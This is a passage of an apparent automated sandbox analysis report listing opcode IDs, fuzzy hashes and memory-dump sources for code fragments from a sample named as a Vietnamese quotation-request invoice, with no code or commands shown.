                                                                                                                                                                                                                                                                  • Opcode ID: 5a9b1f3d7fbdacc18d44a4dee67f562c91de7463bedbfe7455ca072d4d642bc4
                                                                                                                                                                                                                                                                  • Instruction ID: bc6b54fb17755a688f428ceeb3098283bc77fa75eb86464704533687d4c6a058
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5a9b1f3d7fbdacc18d44a4dee67f562c91de7463bedbfe7455ca072d4d642bc4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E6F0A578D00208EFCB54DFA8D441A9CFBB5FB58340F10C1AA981897340D736AA51DF40
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 0c353b1975ea432d3dc97dabf8b5bae6054b1cf4ec77c6ba081952c14595ff66
                                                                                                                                                                                                                                                                  • Instruction ID: 9542a6b4e9b64cbbbea6e9c19e2393a33c1d1ad256ab692a7e82a8a61d6c4406
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0c353b1975ea432d3dc97dabf8b5bae6054b1cf4ec77c6ba081952c14595ff66
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 79F039B8E05208CFDB50DF15D840BAABBFAFB5A354F009095D109B7354DB341991CF02
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.375477473.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_78c0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: b69360f106c70bc14d895bad50af68622f4109275e2f8ed294bb91534c052753
                                                                                                                                                                                                                                                                  • Instruction ID: 8cfe9f7b5dec0b023ef7dca3f6a6752c6db0c59156864f6a8eaceec06b5246b0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b69360f106c70bc14d895bad50af68622f4109275e2f8ed294bb91534c052753
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8ED05E6230412467061821AE285482FA6CEE7DD5B1394403EE60DD3380CD619C0203E6
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.375477473.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_78c0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: a2e245d56110ce1bcd497c01c3cd56a3800082266b097c3a0664518b49340937
                                                                                                                                                                                                                                                                  • Instruction ID: 77e5501c2b7c1b5756b9aa124d229e0b3915304cb5ea9ba6e558e910b09b7d03
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a2e245d56110ce1bcd497c01c3cd56a3800082266b097c3a0664518b49340937
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03E086F1903655ABFF215E78B4097E57AA4DB903B3F04822AE658C21E0DB7DC890C7D0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 6081311089561600f2b577836df81088975ada775b6ad64ae5083b389cacfca7
                                                                                                                                                                                                                                                                  • Instruction ID: 41251c27b272bf0566fd1aea8a06025af81b169a47e414c384055157a234ea8e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6081311089561600f2b577836df81088975ada775b6ad64ae5083b389cacfca7
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ABE0E574E00208EFCB54DFA8D841A9CFBF4FB98304F10C1AA9858A3340D735AA51DF84
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 76a93b0ced68c8e62fe24f6cddc2d73ef87373e42c584d5e73925275b8bcae97
                                                                                                                                                                                                                                                                  • Instruction ID: 67b9241de52e7731ddf3f1e509cbd56b507866a50dd094292ca91f1aa3c0261b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 76a93b0ced68c8e62fe24f6cddc2d73ef87373e42c584d5e73925275b8bcae97
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 27E0C278900208EFCB04DF98E841A9CBBB5FB98314F10C1AAED1897350D732AA61DB84
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.375477473.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_78c0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: c3493f017f170c37acc6e9c1a53f5e43511a25184d35446e8f024721522776fb
                                                                                                                                                                                                                                                                  • Instruction ID: b2c777979718ddfc10128fcf74242a580d31afc039b331d7401008382d34d5e6
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c3493f017f170c37acc6e9c1a53f5e43511a25184d35446e8f024721522776fb
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C4E065B0C1860ADFEB04EFA2D8467AFBBB0AB44304F00C42AC811E2351DB784162CFC0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.375477473.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_78c0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 6beb2ce051ddfc6bfd7dfce4f37225ba1db028662e840f73aabd915d804841dd
                                                                                                                                                                                                                                                                  • Instruction ID: 1f6c0a349632f0d3e207862b8b2774a865e8e3625f7e5944c85087206e1da601
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6beb2ce051ddfc6bfd7dfce4f37225ba1db028662e840f73aabd915d804841dd
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 76D02BF3B000209F9B006E5CBC150EEFBB2F794199304402FD111C6241CA3541268784
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: db115c4df16ffd6612368fb2fef73b4e8f8c625af231106cfab9db692c474937
                                                                                                                                                                                                                                                                  • Instruction ID: c80a02e50d134159fd38bd74564e1a045e13c075e6ef5c2ba1e250c76e203288
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: db115c4df16ffd6612368fb2fef73b4e8f8c625af231106cfab9db692c474937
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8BE07574E05208EFCB54DFA9E54569DFBF5FB88204F10C1AA9918A7340D735AA42CF81
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: db115c4df16ffd6612368fb2fef73b4e8f8c625af231106cfab9db692c474937
                                                                                                                                                                                                                                                                  • Instruction ID: e99e01cde02785492b56fa67b9e8a321c0d144df4bc2ff675fb90014452c0ff3
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: db115c4df16ffd6612368fb2fef73b4e8f8c625af231106cfab9db692c474937
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0CE09A74E05208EFCB54DFA9D54569DFBF4FB88304F10C1AA981897340D735AA42CF81
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: db115c4df16ffd6612368fb2fef73b4e8f8c625af231106cfab9db692c474937
                                                                                                                                                                                                                                                                  • Instruction ID: de101f227bce6a85f0bf51d0e26e1040136464dc540f8e69198a4b55f8077291
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: db115c4df16ffd6612368fb2fef73b4e8f8c625af231106cfab9db692c474937
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 38E07574E05208EFCB54DFA9E54569DFBF4FB88204F10C1AA9958A7340D735AE42CF81
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 78b2355e85aea43149168d3a1c9f0e84034ce73d29ee92edbed66aa5a2cab076
                                                                                                                                                                                                                                                                  • Instruction ID: 5591aa64149414525f7fb08878ed66a758a93ea81c38c102003a5e44e54cb06f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 78b2355e85aea43149168d3a1c9f0e84034ce73d29ee92edbed66aa5a2cab076
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 13D0A772300624934914219D7415D3E7ADED7CA9E2304007FF609C7380CD655C214BE5
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 75fb1943f664a57f8caae077e62a74168b387a93a33d65393b2530b9278a4b75
                                                                                                                                                                                                                                                                  • Instruction ID: 9e362177f6ba9ecdce190440e4a7f8d21152e674123d25b004702d0a0a6fe69a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 75fb1943f664a57f8caae077e62a74168b387a93a33d65393b2530b9278a4b75
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A1E0C2B580650CEFD750FFF5D80079EB7B8EF85148F1040A5C20497150EF306A00E6A2
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: db115c4df16ffd6612368fb2fef73b4e8f8c625af231106cfab9db692c474937
                                                                                                                                                                                                                                                                  • Instruction ID: be52b7ec865e51a18a3b88faa0c3c1cb16b5eb325e65cc215667ef876d6b9e5f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: db115c4df16ffd6612368fb2fef73b4e8f8c625af231106cfab9db692c474937
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9BE07574E05208EFCB54DFA9D54569DFBF4FB88204F10C5AA9918A7341D735AA42CF81
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 299fded574ddcc26bf1b83b933b32bab7cd5addc3e2eeb28ed55e595146ab4db
                                                                                                                                                                                                                                                                  • Instruction ID: 62f9e63dee5101d6fbad487da9f5845adb49c8cf231fb691382822c93f72b7c7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 299fded574ddcc26bf1b83b933b32bab7cd5addc3e2eeb28ed55e595146ab4db
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DCE0C2F580250CFBD740FBF8D80179E77E8EF45288F5040A5D20597190EF302A00E6A2
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: a2762ca88507f69854ea2cd38a9052f8ba0aafdd64e29da405a6132db484a4af
                                                                                                                                                                                                                                                                  • Instruction ID: 7c0aa9cffaa521aa996dcecc902ebe59d7bed1042ff8ea1c45749ae0db3ecc9c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a2762ca88507f69854ea2cd38a9052f8ba0aafdd64e29da405a6132db484a4af
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5AE08C78905208EBCB04DF94E841A6CFBB4FB99300F20C1A9DD0427340CB32AE52DA95
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: a2762ca88507f69854ea2cd38a9052f8ba0aafdd64e29da405a6132db484a4af
                                                                                                                                                                                                                                                                  • Instruction ID: ddd9ea1c9343ddfa086c6b6690a0f03b8cd2cb117bd40b1222b2a035dc625cf1
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a2762ca88507f69854ea2cd38a9052f8ba0aafdd64e29da405a6132db484a4af
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9CE08C78904208EBCB04DF94E841A6CFBB4FB98300F20C1A9DC0427340DB32AE62DA94
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 1bf51883590c2668b96be7c720584922b3e1feb6e451d79eb125060dd88792c2
                                                                                                                                                                                                                                                                  • Instruction ID: abdda2ceaf9f64c9b908a55e40788358994a4c3c9bd80333946f9bb21d8268ac
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1bf51883590c2668b96be7c720584922b3e1feb6e451d79eb125060dd88792c2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51E012F0944619CFDB60DF71D8887AD77B9FB4D365F204596C11967290C7744A84CF01
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 3f9683a3cb5a0b5b332e96f0bf6397ad488720a7606977d2b3c490dc50d6b06f
                                                                                                                                                                                                                                                                  • Instruction ID: 0a832f63287a423517a45df29f960340ef5f21a1f9a1225b8839a0f66c02c20c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3f9683a3cb5a0b5b332e96f0bf6397ad488720a7606977d2b3c490dc50d6b06f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 00D01236701635578921115E641985EBBDECBC5AA23094577FD05C7380CFB5CC2146E1
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 84a8e522760408601f33760c68612c134dfba5d6ce8b552741c803c14dc0070f
                                                                                                                                                                                                                                                                  • Instruction ID: 6a29f3f4c9d6f7ddcb27bfa2d6b7f44019bd50781ceed481e3f429d9da86fbd6
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 84a8e522760408601f33760c68612c134dfba5d6ce8b552741c803c14dc0070f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D1D05B70A0110CEFCB40FFB4D51556E77F5EB4524471084A9D508D7200DF312F109781
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.375477473.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_78c0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: ee89b77b9ab6a9ed0f1fca0bd7fc98d82c19489b1d5193e42ff4db5535bfe133
                                                                                                                                                                                                                                                                  • Instruction ID: 439d61f45b9bfbe6464f1b95c5204ae1e85d1ec07bca579cef8fc515cfc902d1
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ee89b77b9ab6a9ed0f1fca0bd7fc98d82c19489b1d5193e42ff4db5535bfe133
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D6D05B70A0510CFFCB40DFB4D50555DB7F9EB8424471045A9D508D7200DB315F109B41
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.375477473.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_78c0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: aede08654e83c44f16a389143d5f2b58e81fd9503c6d41e02df345a2c9ce4c54
                                                                                                                                                                                                                                                                  • Instruction ID: a19e40c51e2c485477ce4f6698d6a4047f2a71f1dd7e06dc724b1ecfce7984e3
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aede08654e83c44f16a389143d5f2b58e81fd9503c6d41e02df345a2c9ce4c54
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 95D05E70A0220CFFDF40EFB8D90595DB7F9EB84248B1145AAE50CE7710EA316F109B81
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 2a03b752962dc6d4f278452955fd605568ca6a6692000690dd4f3aa54031d4b0
                                                                                                                                                                                                                                                                  • Instruction ID: 2a6fb10be4f4c136e74f553abbd67d298ab33c57370b20bd65d705827bd1a5cd
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2a03b752962dc6d4f278452955fd605568ca6a6692000690dd4f3aa54031d4b0
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ADD05EB002A218CEE7245A22D4043B9726DDB4F388F4070D4C10FAA192C77449848F53
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
